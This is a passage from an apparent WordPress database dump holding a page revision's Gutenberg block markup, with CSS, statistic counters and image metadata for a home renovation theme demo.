.skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"beb68878-1402-4107-acd3-d5a486895047\"} -->\n<style type=\"text/css\"> .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-beb68878-1402-4107-acd3-d5a486895047 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-beb68878-1402-4107-acd3-d5a486895047\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"f7a1e999-5872-4947-8a20-bc38912cc378\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-f7a1e999-5872-4947-8a20-bc38912cc378 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"cd271725-0510-4bf4-aee6-07667f30d332\"} -->\n<style type=\"text/css\"> .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cd271725-0510-4bf4-aee6-07667f30d332 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cd271725-0510-4bf4-aee6-07667f30d332\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"a21e93c2-c946-4524-8ce5-bb6505444fbc\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a21e93c2-c946-4524-8ce5-bb6505444fbc skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','About','','inherit','closed','closed','','154-revision-v1','','','2021-05-27 05:10:37','2021-05-27 05:10:37','',154,'https://cteisys.com/?p=339',0,'revision','',0);
INSERT INTO `wp0y_posts` VALUES (160,1,'2021-05-27 05:13:31','2021-05-27 05:13:31','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"1c5d3225-0569-4d60-a1ac-6e88fb037156\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-1c5d3225-0569-4d60-a1ac-6e88fb037156 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"51b777c0-5d50-4095-91d5-bf31db40658c\"} -->\n<style type=\"text/css\"> .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-51b777c0-5d50-4095-91d5-bf31db40658c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"ddf56773-d63b-4aa1-a60e-8afa90cf3905\"} -->\n<style type=\"text/css\"> .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ddf56773-d63b-4aa1-a60e-8afa90cf3905\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"64187a2f-99ae-4f42-9fb7-d3f586f119c6\"} -->\n<style type=\"text/css\"> .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-64187a2f-99ae-4f42-9fb7-d3f586f119c6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/advance-columns 